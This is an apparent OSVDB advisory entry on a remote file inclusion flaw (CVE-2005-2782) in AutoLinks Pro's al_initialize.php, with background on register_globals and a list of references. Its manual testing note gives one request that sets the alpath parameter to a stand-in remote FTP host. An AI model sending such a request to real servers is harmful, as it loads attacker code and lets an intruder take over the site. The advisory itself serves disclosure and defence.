AutoLinks Pro al_initialize.php alpath Variable Remote File Inclusion

2005-08-28T04:43:42
ID OSVDB:19066
Type osvdb
Reporter OSVDB
Modified 2005-08-28T04:43:42

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

/al_initialize.php?alpath=ftp://host.com/

References:

Vendor URL: http://www.scriptscenter.com/ Security Tracker: 1014815 Secunia Advisory ID:16620 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0408.html CVE-2005-2782 Bugtraq ID: 14686